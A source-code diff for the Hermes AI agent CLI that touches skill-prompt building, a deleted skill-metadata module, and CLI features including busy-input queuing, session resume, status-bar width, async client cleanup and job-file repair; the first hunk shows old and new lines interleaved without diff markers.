category = "/".join(parts[:-2]) if len(parts) > 2 else parts[0]
|
||||
else:
|
||||
category = "general"
|
||||
skill_name = skill_file.parent.name
|
||||
# Respect user's disabled skills config
|
||||
fm_name = frontmatter.get("name", skill_name)
|
||||
if fm_name in disabled or skill_name in disabled:
|
||||
continue
|
||||
# Extract conditions inline from already-parsed frontmatter
|
||||
# (avoids redundant file re-read that _read_skill_conditions would do)
|
||||
hermes_meta = (frontmatter.get("metadata") or {}).get("hermes") or {}
|
||||
conditions = {
|
||||
"fallback_for_toolsets": hermes_meta.get("fallback_for_toolsets", []),
|
||||
"requires_toolsets": hermes_meta.get("requires_toolsets", []),
|
||||
"fallback_for_tools": hermes_meta.get("fallback_for_tools", []),
|
||||
"requires_tools": hermes_meta.get("requires_tools", []),
|
||||
}
|
||||
else:
|
||||
# Cold path: full filesystem scan + write snapshot for next time
|
||||
skill_entries: list[dict] = []
|
||||
for skill_file in iter_skill_index_files(skills_dir, "SKILL.md"):
|
||||
is_compatible, frontmatter, desc = _parse_skill_file(skill_file)
|
||||
entry = _build_snapshot_entry(skill_file, skills_dir, frontmatter, desc)
|
||||
skill_entries.append(entry)
|
||||
if not is_compatible:
|
||||
continue
|
||||
skill_name = entry["skill_name"]
|
||||
if entry["frontmatter_name"] in disabled or skill_name in disabled:
|
||||
continue
|
||||
if not _skill_should_show(
|
||||
extract_skill_conditions(frontmatter),
|
||||
available_tools,
|
||||
available_toolsets,
|
||||
):
|
||||
continue
|
||||
skills_by_category.setdefault(entry["category"], []).append(
|
||||
(skill_name, entry["description"])
|
||||
)
|
||||
if not _skill_should_show(conditions, available_tools, available_toolsets):
|
||||
continue
|
||||
skills_by_category.setdefault(category, []).append((skill_name, desc))
|
||||
|
||||
# Read category-level DESCRIPTION.md files
|
||||
for desc_file in iter_skill_index_files(skills_dir, "DESCRIPTION.md"):
|
||||
if not skills_by_category:
|
||||
return ""
|
||||
|
||||
# Read category-level descriptions from DESCRIPTION.md
|
||||
# Checks both the exact category path and parent directories
|
||||
category_descriptions = {}
|
||||
for category in skills_by_category:
|
||||
cat_path = Path(category)
|
||||
desc_file = skills_dir / cat_path / "DESCRIPTION.md"
|
||||
if desc_file.exists():
|
||||
try:
|
||||
content = desc_file.read_text(encoding="utf-8")
|
||||
fm, _ = parse_frontmatter(content)
|
||||
cat_desc = fm.get("description")
|
||||
if not cat_desc:
|
||||
continue
|
||||
rel = desc_file.relative_to(skills_dir)
|
||||
cat = "/".join(rel.parts[:-1]) if len(rel.parts) > 1 else "general"
|
||||
category_descriptions[cat] = str(cat_desc).strip().strip("'\"")
|
||||
match = re.search(r"^---\s*\n.*?description:\s*(.+?)\s*\n.*?^---", content, re.MULTILINE | re.DOTALL)
|
||||
if match:
|
||||
category_descriptions[category] = match.group(1).strip()
|
||||
except Exception as e:
|
||||
logger.debug("Could not read skill description %s: %s", desc_file, e)
|
||||
|
||||
_write_skills_snapshot(
|
||||
skills_dir,
|
||||
_build_skills_manifest(skills_dir),
|
||||
skill_entries,
|
||||
category_descriptions,
|
||||
)
|
||||
|
||||
if not skills_by_category:
|
||||
result = ""
|
||||
else:
|
||||
index_lines = []
|
||||
for category in sorted(skills_by_category.keys()):
|
||||
cat_desc = category_descriptions.get(category, "")
|
||||
if cat_desc:
|
||||
index_lines.append(f" {category}: {cat_desc}")
|
||||
index_lines = []
|
||||
for category in sorted(skills_by_category.keys()):
|
||||
cat_desc = category_descriptions.get(category, "")
|
||||
if cat_desc:
|
||||
index_lines.append(f" {category}: {cat_desc}")
|
||||
else:
|
||||
index_lines.append(f" {category}:")
|
||||
# Deduplicate and sort skills within each category
|
||||
seen = set()
|
||||
for name, desc in sorted(skills_by_category[category], key=lambda x: x[0]):
|
||||
if name in seen:
|
||||
continue
|
||||
seen.add(name)
|
||||
if desc:
|
||||
index_lines.append(f" - {name}: {desc}")
|
||||
else:
|
||||
index_lines.append(f" {category}:")
|
||||
# Deduplicate and sort skills within each category
|
||||
seen = set()
|
||||
for name, desc in sorted(skills_by_category[category], key=lambda x: x[0]):
|
||||
if name in seen:
|
||||
continue
|
||||
seen.add(name)
|
||||
if desc:
|
||||
index_lines.append(f" - {name}: {desc}")
|
||||
else:
|
||||
index_lines.append(f" - {name}")
|
||||
index_lines.append(f" - {name}")
|
||||
|
||||
result = (
|
||||
"## Skills (mandatory)\n"
|
||||
"Before replying, scan the skills below. If one clearly matches your task, "
|
||||
"load it with skill_view(name) and follow its instructions. "
|
||||
"If a skill has issues, fix it with skill_manage(action='patch').\n"
|
||||
"After difficult/iterative tasks, offer to save as a skill. "
|
||||
"If a skill you loaded was missing steps, had wrong commands, or needed "
|
||||
"pitfalls you discovered, update it before finishing.\n"
|
||||
"\n"
|
||||
"<available_skills>\n"
|
||||
+ "\n".join(index_lines) + "\n"
|
||||
"</available_skills>\n"
|
||||
"\n"
|
||||
"If none match, proceed normally without loading a skill."
|
||||
)
|
||||
|
||||
# ── Store in LRU cache ────────────────────────────────────────────
|
||||
with _SKILLS_PROMPT_CACHE_LOCK:
|
||||
_SKILLS_PROMPT_CACHE[cache_key] = result
|
||||
_SKILLS_PROMPT_CACHE.move_to_end(cache_key)
|
||||
while len(_SKILLS_PROMPT_CACHE) > _SKILLS_PROMPT_CACHE_MAX:
|
||||
_SKILLS_PROMPT_CACHE.popitem(last=False)
|
||||
|
||||
return result
|
||||
return (
|
||||
"## Skills (mandatory)\n"
|
||||
"Before replying, scan the skills below. If one clearly matches your task, "
|
||||
"load it with skill_view(name) and follow its instructions. "
|
||||
"If a skill has issues, fix it with skill_manage(action='patch').\n"
|
||||
"After difficult/iterative tasks, offer to save as a skill. "
|
||||
"If a skill you loaded was missing steps, had wrong commands, or needed "
|
||||
"pitfalls you discovered, update it before finishing.\n"
|
||||
"\n"
|
||||
"<available_skills>\n"
|
||||
+ "\n".join(index_lines) + "\n"
|
||||
"</available_skills>\n"
|
||||
"\n"
|
||||
"If none match, proceed normally without loading a skill."
|
||||
)
|
||||
|
||||
|
||||
# =========================================================================
|
||||
|
||||
@@ -1,203 +0,0 @@
|
||||
"""Lightweight skill metadata utilities shared by prompt_builder and skills_tool.
|
||||
|
||||
This module intentionally avoids importing the tool registry, CLI config, or any
|
||||
heavy dependency chain. It is safe to import at module level without triggering
|
||||
tool registration or provider resolution.
|
||||
"""
|
||||
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Any, Dict, List, Optional, Set, Tuple
|
||||
|
||||
from hermes_constants import get_hermes_home
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
# ── Platform mapping ──────────────────────────────────────────────────────
|
||||
|
||||
PLATFORM_MAP = {
|
||||
"macos": "darwin",
|
||||
"linux": "linux",
|
||||
"windows": "win32",
|
||||
}
|
||||
|
||||
EXCLUDED_SKILL_DIRS = frozenset((".git", ".github", ".hub"))
|
||||
|
||||
# ── Lazy YAML loader ─────────────────────────────────────────────────────
|
||||
|
||||
_yaml_load_fn = None
|
||||
|
||||
|
||||
def yaml_load(content: str):
|
||||
"""Parse YAML with lazy import and CSafeLoader preference."""
|
||||
global _yaml_load_fn
|
||||
if _yaml_load_fn is None:
|
||||
import yaml
|
||||
|
||||
loader = getattr(yaml, "CSafeLoader", None) or yaml.SafeLoader
|
||||
|
||||
def _load(value: str):
|
||||
return yaml.load(value, Loader=loader)
|
||||
|
||||
_yaml_load_fn = _load
|
||||
return _yaml_load_fn(content)
|
||||
|
||||
|
||||
# ── Frontmatter parsing ──────────────────────────────────────────────────
|
||||
|
||||
|
||||
def parse_frontmatter(content: str) -> Tuple[Dict[str, Any], str]:
|
||||
"""Parse YAML frontmatter from a markdown string.
|
||||
|
||||
Uses yaml with CSafeLoader for full YAML support (nested metadata, lists)
|
||||
with a fallback to simple key:value splitting for robustness.
|
||||
|
||||
Returns:
|
||||
(frontmatter_dict, remaining_body)
|
||||
"""
|
||||
frontmatter: Dict[str, Any] = {}
|
||||
body = content
|
||||
|
||||
if not content.startswith("---"):
|
||||
return frontmatter, body
|
||||
|
||||
end_match = re.search(r"\n---\s*\n", content[3:])
|
||||
if not end_match:
|
||||
return frontmatter, body
|
||||
|
||||
yaml_content = content[3 : end_match.start() + 3]
|
||||
body = content[end_match.end() + 3 :]
|
||||
|
||||
try:
|
||||
parsed = yaml_load(yaml_content)
|
||||
if isinstance(parsed, dict):
|
||||
frontmatter = parsed
|
||||
except Exception:
|
||||
# Fallback: simple key:value parsing for malformed YAML
|
||||
for line in yaml_content.strip().split("\n"):
|
||||
if ":" not in line:
|
||||
continue
|
||||
key, value = line.split(":", 1)
|
||||
frontmatter[key.strip()] = value.strip()
|
||||
|
||||
return frontmatter, body
|
||||
|
||||
|
||||
# ── Platform matching ─────────────────────────────────────────────────────
|
||||
|
||||
|
||||
def skill_matches_platform(frontmatter: Dict[str, Any]) -> bool:
|
||||
"""Return True when the skill is compatible with the current OS.
|
||||
|
||||
Skills declare platform requirements via a top-level ``platforms`` list
|
||||
in their YAML frontmatter::
|
||||
|
||||
platforms: [macos] # macOS only
|
||||
platforms: [macos, linux] # macOS and Linux
|
||||
|
||||
If the field is absent or empty the skill is compatible with **all**
|
||||
platforms (backward-compatible default).
|
||||
"""
|
||||
platforms = frontmatter.get("platforms")
|
||||
if not platforms:
|
||||
return True
|
||||
if not isinstance(platforms, list):
|
||||
platforms = [platforms]
|
||||
current = sys.platform
|
||||
for platform in platforms:
|
||||
normalized = str(platform).lower().strip()
|
||||
mapped = PLATFORM_MAP.get(normalized, normalized)
|
||||
if current.startswith(mapped):
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
# ── Disabled skills ───────────────────────────────────────────────────────
|
||||
|
||||
|
||||
def get_disabled_skill_names() -> Set[str]:
|
||||
"""Read disabled skill names from config.yaml.
|
||||
|
||||
Resolves platform from ``HERMES_PLATFORM`` env var, falls back to
|
||||
the global disabled list. Reads the config file directly (no CLI
|
||||
config imports) to stay lightweight.
|
||||
"""
|
||||
config_path = get_hermes_home() / "config.yaml"
|
||||
if not config_path.exists():
|
||||
return set()
|
||||
try:
|
||||
parsed = yaml_load(config_path.read_text(encoding="utf-8"))
|
||||
except Exception as e:
|
||||
logger.debug("Could not read skill config %s: %s", config_path, e)
|
||||
return set()
|
||||
if not isinstance(parsed, dict):
|
||||
return set()
|
||||
|
||||
skills_cfg = parsed.get("skills")
|
||||
if not isinstance(skills_cfg, dict):
|
||||
return set()
|
||||
|
||||
resolved_platform = os.getenv("HERMES_PLATFORM")
|
||||
if resolved_platform:
|
||||
platform_disabled = (skills_cfg.get("platform_disabled") or {}).get(
|
||||
resolved_platform
|
||||
)
|
||||
if platform_disabled is not None:
|
||||
return _normalize_string_set(platform_disabled)
|
||||
return _normalize_string_set(skills_cfg.get("disabled"))
|
||||
|
||||
|
||||
def _normalize_string_set(values) -> Set[str]:
|
||||
if values is None:
|
||||
return set()
|
||||
if isinstance(values, str):
|
||||
values = [values]
|
||||
return {str(v).strip() for v in values if str(v).strip()}
|
||||
|
||||
|
||||
# ── Condition extraction ──────────────────────────────────────────────────
|
||||
|
||||
|
||||
def extract_skill_conditions(frontmatter: Dict[str, Any]) -> Dict[str, List]:
|
||||
"""Extract conditional activation fields from parsed frontmatter."""
|
||||
hermes = (frontmatter.get("metadata") or {}).get("hermes") or {}
|
||||
return {
|
||||
"fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
|
||||
"requires_toolsets": hermes.get("requires_toolsets", []),
|
||||
"fallback_for_tools": hermes.get("fallback_for_tools", []),
|
||||
"requires_tools": hermes.get("requires_tools", []),
|
||||
}
|
||||
|
||||
|
||||
# ── Description extraction ────────────────────────────────────────────────
|
||||
|
||||
|
||||
def extract_skill_description(frontmatter: Dict[str, Any]) -> str:
|
||||
"""Extract a truncated description from parsed frontmatter."""
|
||||
raw_desc = frontmatter.get("description", "")
|
||||
if not raw_desc:
|
||||
return ""
|
||||
desc = str(raw_desc).strip().strip("'\"")
|
||||
if len(desc) > 60:
|
||||
return desc[:57] + "..."
|
||||
return desc
|
||||
|
||||
|
||||
# ── File iteration ────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
def iter_skill_index_files(skills_dir: Path, filename: str):
|
||||
"""Walk skills_dir yielding sorted paths matching *filename*.
|
||||
|
||||
Excludes ``.git``, ``.github``, ``.hub`` directories.
|
||||
"""
|
||||
matches = []
|
||||
for root, dirs, files in os.walk(skills_dir):
|
||||
dirs[:] = [d for d in dirs if d not in EXCLUDED_SKILL_DIRS]
|
||||
if filename in files:
|
||||
matches.append(Path(root) / filename)
|
||||
for path in sorted(matches, key=lambda p: str(p.relative_to(skills_dir))):
|
||||
yield path
|
||||
@@ -688,12 +688,6 @@ display:
|
||||
# Toggle at runtime with /verbose in the CLI
|
||||
tool_progress: all
|
||||
|
||||
# What Enter does when Hermes is already busy in the CLI.
|
||||
# interrupt: Interrupt the current run and redirect Hermes (default)
|
||||
# queue: Queue your message for the next turn
|
||||
# Ctrl+C always interrupts regardless of this setting.
|
||||
busy_input_mode: interrupt
|
||||
|
||||
# Background process notifications (gateway/messaging only).
|
||||
# Controls how chatty the process watcher is when you use
|
||||
# terminal(background=true, check_interval=...) from Telegram/Discord/etc.
|
||||
|
||||
@@ -205,7 +205,6 @@ def load_cli_config() -> Dict[str, Any]:
|
||||
"resume_display": "full",
|
||||
"show_reasoning": False,
|
||||
"streaming": True,
|
||||
"busy_input_mode": "interrupt",
|
||||
|
||||
"skin": "default",
|
||||
},
|
||||
@@ -449,17 +448,6 @@ try:
|
||||
except Exception:
|
||||
pass # Skin engine is optional — default skin used if unavailable
|
||||
|
||||
# Neuter AsyncHttpxClientWrapper.__del__ before any AsyncOpenAI clients are
|
||||
# created. The SDK's __del__ schedules aclose() on asyncio.get_running_loop()
|
||||
# which, during CLI idle time, finds prompt_toolkit's event loop and tries to
|
||||
# close TCP transports bound to dead worker loops — producing
|
||||
# "Event loop is closed" / "Press ENTER to continue..." errors.
|
||||
try:
|
||||
from agent.auxiliary_client import neuter_async_httpx_del
|
||||
neuter_async_httpx_del()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
from rich import box as rich_box
|
||||
from rich.console import Console
|
||||
from rich.markup import escape as _escape
|
||||
@@ -1047,18 +1035,13 @@ class HermesCLI:
|
||||
self.config = CLI_CONFIG
|
||||
self.compact = compact if compact is not None else CLI_CONFIG["display"].get("compact", False)
|
||||
# tool_progress: "off", "new", "all", "verbose" (from config.yaml display section)
|
||||
# YAML 1.1 parses bare `off` as boolean False — normalise to string.
|
||||
_raw_tp = CLI_CONFIG["display"].get("tool_progress", "all")
|
||||
self.tool_progress_mode = "off" if _raw_tp is False else str(_raw_tp)
|
||||
self.tool_progress_mode = CLI_CONFIG["display"].get("tool_progress", "all")
|
||||
# resume_display: "full" (show history) | "minimal" (one-liner only)
|
||||
self.resume_display = CLI_CONFIG["display"].get("resume_display", "full")
|
||||
# bell_on_complete: play terminal bell (\a) when agent finishes a response
|
||||
self.bell_on_complete = CLI_CONFIG["display"].get("bell_on_complete", False)
|
||||
# show_reasoning: display model thinking/reasoning before the response
|
||||
self.show_reasoning = CLI_CONFIG["display"].get("show_reasoning", False)
|
||||
# busy_input_mode: "interrupt" (Enter interrupts current run) or "queue" (Enter queues for next turn)
|
||||
_bim = CLI_CONFIG["display"].get("busy_input_mode", "interrupt")
|
||||
self.busy_input_mode = "queue" if str(_bim).strip().lower() == "queue" else "interrupt"
|
||||
|
||||
self.verbose = verbose if verbose is not None else (self.tool_progress_mode == "verbose")
|
||||
|
||||
@@ -1083,7 +1066,7 @@ class HermesCLI:
|
||||
self.model = model or _config_model or _FALLBACK_MODEL
|
||||
# Auto-detect model from local server if still on fallback
|
||||
if self.model == _FALLBACK_MODEL:
|
||||
_base_url = (_model_config.get("base_url") or "") if isinstance(_model_config, dict) else ""
|
||||
_base_url = _model_config.get("base_url", "") if isinstance(_model_config, dict) else ""
|
||||
if "localhost" in _base_url or "127.0.0.1" in _base_url:
|
||||
from hermes_cli.runtime_provider import _auto_detect_local_model
|
||||
_detected = _auto_detect_local_model(_base_url)
|
||||
@@ -1346,12 +1329,7 @@ class HermesCLI:
|
||||
def _build_status_bar_text(self, width: Optional[int] = None) -> str:
|
||||
try:
|
||||
snapshot = self._get_status_bar_snapshot()
|
||||
if width is None:
|
||||
try:
|
||||
from prompt_toolkit.application import get_app
|
||||
width = get_app().output.get_size().columns
|
||||
except Exception:
|
||||
width = shutil.get_terminal_size((80, 24)).columns
|
||||
width = width or shutil.get_terminal_size((80, 24)).columns
|
||||
percent = snapshot["context_percent"]
|
||||
percent_label = f"{percent}%" if percent is not None else "--"
|
||||
duration_label = snapshot["duration"]
|
||||
@@ -1381,16 +1359,7 @@ class HermesCLI:
|
||||
return []
|
||||
try:
|
||||
snapshot = self._get_status_bar_snapshot()
|
||||
# Use prompt_toolkit's own terminal width when running inside the
|
||||
# TUI — shutil.get_terminal_size() can return stale or fallback
|
||||
# values (especially on SSH) that differ from what prompt_toolkit
|
||||
# actually renders, causing the fragments to overflow to a second
|
||||
# line and produce duplicated status bar rows over long sessions.
|
||||
try:
|
||||
from prompt_toolkit.application import get_app
|
||||
width = get_app().output.get_size().columns
|
||||
except Exception:
|
||||
width = shutil.get_terminal_size((80, 24)).columns
|
||||
width = shutil.get_terminal_size((80, 24)).columns
|
||||
duration_label = snapshot["duration"]
|
||||
|
||||
if width < 52:
|
||||
@@ -1625,7 +1594,6 @@ class HermesCLI:
|
||||
if not text:
|
||||
return
|
||||
self._reasoning_stream_started = True
|
||||
self._reasoning_shown_this_turn = True
|
||||
if getattr(self, "_stream_box_opened", False):
|
||||
return
|
||||
|
||||
@@ -2961,82 +2929,6 @@ class HermesCLI:
|
||||
if not silent:
|
||||
print("(^_^)v New session started!")
|
||||
|
||||
def _handle_resume_command(self, cmd_original: str) -> None:
|
||||
"""Handle /resume <session_id_or_title> — switch to a previous session mid-conversation."""
|
||||
parts = cmd_original.split(None, 1)
|
||||
target = parts[1].strip() if len(parts) > 1 else ""
|
||||
|
||||
if not target:
|
||||
_cprint(" Usage: /resume <session_id_or_title>")
|
||||
_cprint(" Tip: Use /history or `hermes sessions list` to find sessions.")
|
||||
return
|
||||
|
||||
if not self._session_db:
|
||||
_cprint(" Session database not available.")
|
||||
return
|
||||
|
||||
# Resolve title or ID
|
||||
from hermes_cli.main import _resolve_session_by_name_or_id
|
||||
resolved = _resolve_session_by_name_or_id(target)
|
||||
target_id = resolved or target
|
||||
|
||||
session_meta = self._session_db.get_session(target_id)
|
||||
if not session_meta:
|
||||
_cprint(f" Session not found: {target}")
|
||||
_cprint(" Use /history or `hermes sessions list` to see available sessions.")
|
||||
return
|
||||
|
||||
if target_id == self.session_id:
|
||||
_cprint(" Already on that session.")
|
||||
return
|
||||
|
||||
# End current session
|
||||
try:
|
||||
self._session_db.end_session(self.session_id, "resumed_other")
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Switch to the target session
|
||||
self.session_id = target_id
|
||||
self._resumed = True
|
||||
self._pending_title = None
|
||||
|
||||
# Load conversation history
|
||||
restored = self._session_db.get_messages_as_conversation(target_id)
|
||||
self.conversation_history = restored or []
|
||||
|
||||
# Re-open the target session so it's not marked as ended
|
||||
try:
|
||||
self._session_db.reopen_session(target_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Sync the agent if already initialised
|
||||
if self.agent:
|
||||
self.agent.session_id = target_id
|
||||
self.agent.reset_session_state()
|
||||
if hasattr(self.agent, "_last_flushed_db_idx"):
|
||||
self.agent._last_flushed_db_idx = len(self.conversation_history)
|
||||
if hasattr(self.agent, "_todo_store"):
|
||||
try:
|
||||
from tools.todo_tool import TodoStore
|
||||
self.agent._todo_store = TodoStore()
|
||||
except Exception:
|
||||
pass
|
||||
if hasattr(self.agent, "_invalidate_system_prompt"):
|
||||
self.agent._invalidate_system_prompt()
|
||||
|
||||
title_part = f" \"{session_meta['title']}\"" if session_meta.get("title") else ""
|
||||
msg_count = len([m for m in self.conversation_history if m.get("role") == "user"])
|
||||
if self.conversation_history:
|
||||
_cprint(
|
||||
f" ↻ Resumed session {target_id}{title_part}"
|
||||
f" ({msg_count} user message{'s' if msg_count != 1 else ''},"
|
||||
f" {len(self.conversation_history)} total)"
|
||||
)
|
||||
else:
|
||||
_cprint(f" ↻ Resumed session {target_id}{title_part} — no messages, starting fresh.")
|
||||
|
||||
def reset_conversation(self):
|
||||
"""Reset the conversation by starting a new session."""
|
||||
self.new_session()
|
||||
@@ -3755,8 +3647,6 @@ class HermesCLI:
|
||||
_cprint(" Session database not available.")
|
||||
elif canonical == "new":
|
||||
self.new_session()
|
||||
elif canonical == "resume":
|
||||
self._handle_resume_command(cmd_original)
|
||||
elif canonical == "provider":
|
||||
self._show_model_and_providers()
|
||||
elif canonical == "prompt":
|
||||
@@ -3832,17 +3722,17 @@ class HermesCLI:
|
||||
elif canonical == "background":
|
||||
self._handle_background_command(cmd_original)
|
||||
elif canonical == "queue":
|
||||
# Extract prompt after "/queue " or "/q "
|
||||
parts = cmd_original.split(None, 1)
|
||||
payload = parts[1].strip() if len(parts) > 1 else ""
|
||||
if not payload:
|
||||
_cprint(" Usage: /queue <prompt>")
|
||||
if not self._agent_running:
|
||||
_cprint(" /queue only works while Hermes is busy. Just type your message normally.")
|
||||
else:
|
||||
self._pending_input.put(payload)
|
||||
if self._agent_running:
|
||||
_cprint(f" Queued for the next turn: {payload[:80]}{'...' if len(payload) > 80 else ''}")
|
||||
# Extract prompt after "/queue " or "/q "
|
||||
parts = cmd_original.split(None, 1)
|
||||
payload = parts[1].strip() if len(parts) > 1 else ""
|
||||
if not payload:
|
||||
_cprint(" Usage: /queue <prompt>")
|
||||
else:
|
||||
_cprint(f" Queued: {payload[:80]}{'...' if len(payload) > 80 else ''}")
|
||||
self._pending_input.put(payload)
|
||||
_cprint(f" Queued for the next turn: {payload[:80]}{'...' if len(payload) > 80 else ''}")
|
||||
elif canonical == "skin":
|
||||
self._handle_skin_command(cmd_original)
|
||||
elif canonical == "voice":
|
||||
@@ -5546,10 +5436,6 @@ class HermesCLI:
|
||||
|
||||
# Reset streaming display state for this turn
|
||||
self._reset_stream_state()
|
||||
# Separate from _reset_stream_state because this must persist
|
||||
# across intermediate turn boundaries (tool-calling loops) — only
|
||||
# reset at the start of each user turn.
|
||||
self._reasoning_shown_this_turn = False
|
||||
|
||||
# --- Streaming TTS setup ---
|
||||
# When ElevenLabs is the TTS provider and sounddevice is available,
|
||||
@@ -5694,16 +5580,6 @@ class HermesCLI:
|
||||
|
||||
agent_thread.join() # Ensure agent thread completes
|
||||
|
||||
# Proactively clean up async clients whose event loop is dead.
|
||||
# The agent thread may have created AsyncOpenAI clients bound
|
||||
# to a per-thread event loop; if that loop is now closed, those
|
||||
# clients' __del__ would crash prompt_toolkit's loop on GC.
|
||||
try:
|
||||
from agent.auxiliary_client import cleanup_stale_async_clients
|
||||
cleanup_stale_async_clients()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Flush any remaining streamed text and close the box
|
||||
self._flush_stream()
|
||||
|
||||
@@ -5764,13 +5640,8 @@ class HermesCLI:
|
||||
response_previewed = result.get("response_previewed", False) if result else False
|
||||
|
||||
# Display reasoning (thinking) box if enabled and available.
|
||||
# Skip when streaming already showed reasoning live. Use the
|
||||
# turn-persistent flag (_reasoning_shown_this_turn) instead of
|
||||
# _reasoning_stream_started — the latter gets reset during
|
||||
# intermediate turn boundaries (tool-calling loops), which caused
|
||||
# the reasoning box to re-render after the final response.
|
||||
_reasoning_already_shown = getattr(self, '_reasoning_shown_this_turn', False)
|
||||
if self.show_reasoning and result and not _reasoning_already_shown:
|
||||
# Skip when streaming already showed reasoning live.
|
||||
if self.show_reasoning and result and not self._reasoning_stream_started:
|
||||
reasoning = result.get("last_reasoning")
|
||||
if reasoning:
|
||||
w = shutil.get_terminal_size().columns
|
||||
@@ -6157,18 +6028,10 @@ class HermesCLI:
|
||||
set_approval_callback(self._approval_callback)
|
||||
set_secret_capture_callback(self._secret_capture_callback)
|
||||
|
||||
# Ensure tirith security scanner is available (downloads if needed).
|
||||
# Warn the user if tirith is enabled in config but not available,
|
||||
# so they know command security scanning is degraded.
|
||||
# Ensure tirith security scanner is available (downloads if needed)
|
||||
try:
|
||||
from tools.tirith_security import ensure_installed
|
||||
tirith_path = ensure_installed(log_failures=False)
|
||||
if tirith_path is None:
|
||||
security_cfg = self.config.get("security", {}) or {}
|
||||
tirith_enabled = security_cfg.get("tirith_enabled", True)
|
||||
if tirith_enabled:
|
||||
_cprint(f" {_DIM}⚠ tirith security scanner enabled but not available "
|
||||
f"— command scanning will use pattern matching only{_RST}")
|
||||
ensure_installed(log_failures=False)
|
||||
except Exception:
|
||||
pass # Non-fatal — fail-open at scan time if unavailable
|
||||
|
||||
@@ -6249,22 +6112,16 @@ class HermesCLI:
|
||||
# Bundle text + images as a tuple when images are present
|
||||
payload = (text, images) if images else text
|
||||
if self._agent_running and not (text and text.startswith("/")):
|
||||
if self.busy_input_mode == "queue":
|
||||
# Queue for the next turn instead of interrupting
|
||||
self._pending_input.put(payload)
|
||||
preview = text if text else f"[{len(images)} image{'s' if len(images) != 1 else ''} attached]"
|
||||
_cprint(f" Queued for the next turn: {preview[:80]}{'...' if len(preview) > 80 else ''}")
|
||||
else:
|
||||
self._interrupt_queue.put(payload)
|
||||
# Debug: log to file when message enters interrupt queue
|
||||
try:
|
||||
_dbg = _hermes_home / "interrupt_debug.log"
|
||||
with open(_dbg, "a") as _f:
|
||||
import time as _t
|
||||
_f.write(f"{_t.strftime('%H:%M:%S')} ENTER: queued interrupt msg={str(payload)[:60]!r}, "
|
||||
f"agent_running={self._agent_running}\n")
|
||||
except Exception:
|
||||
pass
|
||||
self._interrupt_queue.put(payload)
|
||||
# Debug: log to file when message enters interrupt queue
|
||||
try:
|
||||
_dbg = _hermes_home / "interrupt_debug.log"
|
||||
with open(_dbg, "a") as _f:
|
||||
import time as _t
|
||||
_f.write(f"{_t.strftime('%H:%M:%S')} ENTER: queued interrupt msg={str(payload)[:60]!r}, "
|
||||
f"agent_running={self._agent_running}\n")
|
||||
except Exception:
|
||||
pass
|
||||
else:
|
||||
self._pending_input.put(payload)
|
||||
event.app.current_buffer.reset(append_to_history=True)
|
||||
@@ -7037,15 +6894,6 @@ class HermesCLI:
|
||||
Window(
|
||||
content=FormattedTextControl(lambda: cli_ref._get_status_bar_fragments()),
|
||||
height=1,
|
||||
# Prevent fragments that overflow the terminal width from
|
||||
# wrapping onto a second line, which causes the status bar to
|
||||
# appear duplicated (one full + one partial row) during long
|
||||
# sessions, especially on SSH where shutil.get_terminal_size
|
||||
# may return stale values. _get_status_bar_fragments now reads
|
||||
# width from prompt_toolkit's own output object, so fragments
|
||||
# will always fit; wrap_lines=False is the belt-and-suspenders
|
||||
# guard against any future width mismatch.
|
||||
wrap_lines=False,
|
||||
),
|
||||
filter=Condition(lambda: cli_ref._status_bar_visible),
|
||||
)
|
||||
@@ -7280,28 +7128,9 @@ class HermesCLI:
|
||||
# Register atexit cleanup so resources are freed even on unexpected exit
|
||||
atexit.register(_run_cleanup)
|
||||
|
||||
# Install a custom asyncio exception handler that suppresses the
|
||||
# "Event loop is closed" RuntimeError from httpx transport cleanup.
|
||||
# This is defense-in-depth — the primary fix is neuter_async_httpx_del
|
||||
# which disables __del__ entirely, but older clients or SDK upgrades
|
||||
# could bypass it.
|
||||
def _suppress_closed_loop_errors(loop, context):
|
||||
exc = context.get("exception")
|
||||
if isinstance(exc, RuntimeError) and "Event loop is closed" in str(exc):
|
||||
return # silently suppress
|
||||
# Fall back to default handler for everything else
|
||||
loop.default_exception_handler(context)
|
||||
|
||||
# Run the application with patch_stdout for proper output handling
|
||||
try:
|
||||
with patch_stdout():
|
||||
# Set the custom handler on prompt_toolkit's event loop
|
||||
try:
|
||||
import asyncio as _aio
|
||||
_loop = _aio.get_event_loop()
|
||||
_loop.set_exception_handler(_suppress_closed_loop_errors)
|
||||
except Exception:
|
||||
pass
|
||||
app.run()
|
||||
except (EOFError, KeyboardInterrupt):
|
||||
pass
|
||||
|
||||
+1
-42
@@ -327,20 +327,7 @@ def load_jobs() -> List[Dict[str, Any]]:
|
||||
with open(JOBS_FILE, 'r', encoding='utf-8') as f:
|
||||
data = json.load(f)
|
||||
return data.get("jobs", [])
|
||||
except json.JSONDecodeError:
|
||||
# Retry with strict=False to handle bare control chars in string values
|
||||
try:
|
||||
with open(JOBS_FILE, 'r', encoding='utf-8') as f:
|
||||
data = json.loads(f.read(), strict=False)
|
||||
jobs = data.get("jobs", [])
|
||||
if jobs:
|
||||
# Auto-repair: rewrite with proper escaping
|
||||
save_jobs(jobs)
|
||||
logger.warning("Auto-repaired jobs.json (had invalid control characters)")
|
||||
return jobs
|
||||
except Exception:
|
||||
return []
|
||||
except IOError:
|
||||
except (json.JSONDecodeError, IOError):
|
||||
return []
|
||||
|
||||
|
||||
@@ -611,34 +598,6 @@ def mark_job_run(job_id: str, success: bool, error: Optional[str] = None):
|
||||
save_jobs(jobs)
|
||||
|
||||
|
||||
def advance_next_run(job_id: str) -> bool:
|
||||
"""Preemptively advance next_run_at for a recurring job before execution.
|
||||
|
||||
Call this BEFORE run_job() so that if the process crashes mid-execution,
|
||||
the job won't re-fire on the next gateway restart. This converts the
|
||||
scheduler from at-least-once to at-most-once for recurring jobs — missing
|
||||
one run is far better than firing dozens of times in a crash loop.
|
||||
|
||||
One-shot jobs are left unchanged so they can still retry on restart.
|
||||
|
||||
Returns True if next_run_at was advanced, False otherwise.
|
||||
"""
|
||||
jobs = load_jobs()
|
||||
for job in jobs:
|
||||
if job["id"] == job_id:
|
||||
